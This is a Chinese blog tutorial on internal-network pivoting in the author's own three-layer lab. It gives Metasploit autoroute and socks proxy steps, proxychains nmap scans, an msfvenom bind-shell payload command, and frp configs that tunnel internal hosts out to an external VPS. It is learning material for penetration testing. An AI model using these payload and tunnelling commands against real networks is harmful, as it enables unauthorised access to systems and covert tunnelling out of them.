基于自建靶场三层网络的内网渗透

本文介绍了如何利用webshell、Metasploit框架(msf)进行内网代理设置和渗透测试,包括添加路由、设置msf代理、使用nmap扫描以及FRP进行内网穿透。文章详细阐述了通过代理链和多层代理访问内网服务器的过程,并强调所有内容仅用于安全技术学习,不得用于非法活动。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

注意:一切内容仅用于安全技术的分享,切勿用于其他用途,产生严重的后果与作者无关

前言介绍:

网络拓扑图:

为了方便起见,我在每个服务器放有webshell,这里主要是让我们熟悉sock代理的使用。

这里搭建的话可以看我之前写的文章:linux(ubuntu)网卡配置/防火墙ufw_不习惯有你的博客-CSDN博客

msf中代理的使用:

首先连接到web1的webshell

我们将其转到msf,这里我们最好放到/tmp目录下,因为tmp目录的执行权限是777

添加路由,对内网进一步测试。

设置msf代理(server/socks_proxy),这里srvhost设置为主机ip(类似于192.168.*.*),srvport设置为10800,然后exploit -j

在msf的session中设置路由

//设置路由    set
run autoroute -s    192.168.122.128/24
//显示路由    print
run autoroute -p

测试下proxychians4代理是否正常

使用nmap对内网进行扫描,存在192.168.122.131,这里需要带上-Pn,进行noping扫描,后面--min-hostgroup 1024 --min-parallelism 1024,加快扫描速度

proxychains4 nmap  -Pn -sT -T4  -p 80 -T4 --min-hostgroup 1024 --min-parallelism 1024    192.168.122.128/24

发现192.168.122.131主机是存在的,这时候我们就可以访问下我们的webshell,这里是为了方便练习内网简化一些操作,我们给浏览器加上主机代理

我们连上192.168.122.131的webshell

进入到web2后我们使用正向shell将其代理出去给msf,这样我们有更多的操作空间,因为web2主机不出网

使用msfvenom生成payload,放到web2上运行,放到tmp目录设置权限777运行

msfvenom -p linux/x64/meterpreter/bind_tcp   LPORT=19999  -f elf > hjwwebshell.elf

我们连接到后使用msf查看路由

添加路由192.168.22.129,我们接着就是对网段192.168.22.129/24这个网段进行渗透

使用nmap对192.168.22.129/24这个网段进行主机存活扫描,发现192.168.22.155存在

我们访问下,主机存活

使用浏览器看看192.168.22.155的内容

使用webshell连接web3主机,连接成功

使用frp进行渗透:

网络拓扑图:

这里我们使用frp进行内网穿透,将123.60.89.153作为代理服务器,在我vps上放frp服务端,在web1上放frp客户端,因为我们要渗透web3(192.168.22.155),这里我们要进行二层代理,然后在web1上开一个服务端,然后再web2上开个客户端,从而能够访问到web3

首先在vps上开启服务端

连接web1,上传frp从而对web2进行渗透(记得chmod以下权限)

配置下frpc.ini,然后启动

修改proxychians4的代理

porxychains4下web2(192.168.122.129),这里由于ip变化,则我们实际的ip(192.168.122.131)

我们给浏览器使用代理,使用浏览器访问下web2,成功访问

我们连接web2的webshell,记得给蚁剑添加代理,我们上传frp

现在我们给web2代理出去,这里我们对web1的frpc进行继续配置

[common]
server_addr = 123.60.79.153
server_port = 7000
tls_enable = true

[socks5_web1]
type = tcp
plugin = socks5
remote_port = 52013

[socks5_web2]
type = tcp
remote_port = 52014
local_ip = 192.168.122.128
local_port = 52000

这里socks5_web2里面的意思就是,将本地的52000端口转发到52014端口,这里我们还需要在web1上开一个frps,将web2转发到web1的5200这个端口上,从而将web代理出去。流程是:

hack  ->  vps  <-  web1  <-  web2

 这里可能存在一些一点问题,这只是我的理解,欢迎提出建议。

我们对web1中的frps.ini进行配置

[common]
bind_port = 7000

现在对web2的frpc.ini进行配置

[common]
server_addr = 192.168.122.128
server_port = 7000
tls_enable = true

[socks5_web1]
type = tcp
plugin = socks5
remote_port = 52000

现在我们通过代理vps的52013端口可以访问到web1,代理52014端口可以访问到web2

我们在web3中已经放了webshell,这时候我们给修改代理为vps的52014端口,成功连接到web3

使用ew进行渗透:

使用ew这里会更简单,搞懂上面的msf和frp的思路,那么ew看看就会了,这里就不再文章里面记录,还是推荐自己动手操作下。

GitHub - idlefire/ew: 内网穿透(跨平台)

总结:

这里我只是做一个简单的工具熟悉,所以在几个web服务器上都放了webshell

还请各位大佬不用攻击我的服务器,为了更好的理解,所以就以自己服务器来演示

一切内容仅用于安全技术的学习,切勿用于其他用途

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值